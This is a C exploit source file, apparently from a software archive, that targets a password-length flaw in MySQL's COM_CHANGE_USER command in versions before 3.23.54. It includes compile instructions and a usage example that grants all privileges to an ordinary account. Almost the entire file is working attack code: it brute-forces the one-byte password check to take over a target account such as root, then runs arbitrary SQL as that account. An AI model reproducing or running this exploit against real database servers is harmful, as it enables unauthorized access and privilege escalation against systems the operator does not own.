home *** CD-ROM | disk | FTP | other *** search
- /* MySql < 3.23.54 COM_CHANGE_USER password length vuln hack :P
- *
- * Discovered by e-matters
- * Advisory: http://security.e-matters.de/advisories/042002.html
- *
- * Usage: mysqlhack "host" "valid_user" "valid_pass" "user_to_become" "sql_command_to_execute_as_user_to_become"
- * dreyer <dreyer@subdimension.com>
- * Version 0.1
- *
- * What you need:
- * A valid user loginable from this host
- * Password for that user
- * Target user loginable from this host (sql will be executed as this user)
- *
- * Compile: gcc -o mysqlhack mysqlhack.c -lmysqlclient
- * i.e.:
- * ./mysqlhack localhost user pass root "grant all privileges on *.* to 'user';"
- *
- * Greetings to: jaxp, kicat, and all people in #ngsec @ irc-hispano network
- */
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <mysql/mysql.h>
-
-
-
- int main(int argc, char **argv)
- {
- MYSQL *sock,mysql;
- char abuf[200];
- char *pass;
- int result,i;
-
- printf("[+] MySql <3.23.54 SUer by \033[1;33mdreyer@subdimension.com\033[0m\n");
- memset (abuf,0,sizeof(abuf));
- if (argc != 6)
- {
- fprintf(stderr,"usage : mysqlhack <host> <user> <pass> <user_dest> <sql_command>\n\n");
- exit(1);
- }
-
- printf("[+] Conecting...\n");
- mysql_init(&mysql);
- if (!(sock = mysql_real_connect(&mysql,argv[1],argv[2],argv[3],NULL,3306,NULL,0)))
- {
- fprintf(stderr,"[-] Couldn't connect to engine!\n%s\n",mysql_error(&mysql));
- perror("");
- exit(1);
- }
- printf("[+] Begining attack...\n");
-
- strcpy(abuf,argv[4]);
- pass=abuf+strlen(abuf)+1;
- for(i=64;i<97;i++) {
- *pass=i;
- net_clear(&sock->net);
- if (net_write_command(&sock->net,COM_CHANGE_USER, abuf,strlen(abuf)+3))
- {
- printf("[-] Can't send command to server.\n");
- }
- if (my_net_read(&sock->net)==packet_error)
- printf("Packet Error\n");
- if(!mysql_query(sock,argv[5]))
- {
- printf("[+] Ok command executed '%s'\n",argv[5]);
- mysql_close(sock);
- exit(0);
- }
- }
- printf("[-] Sorry, attack didn't succeed\n");
- mysql_close(sock);
- }
-
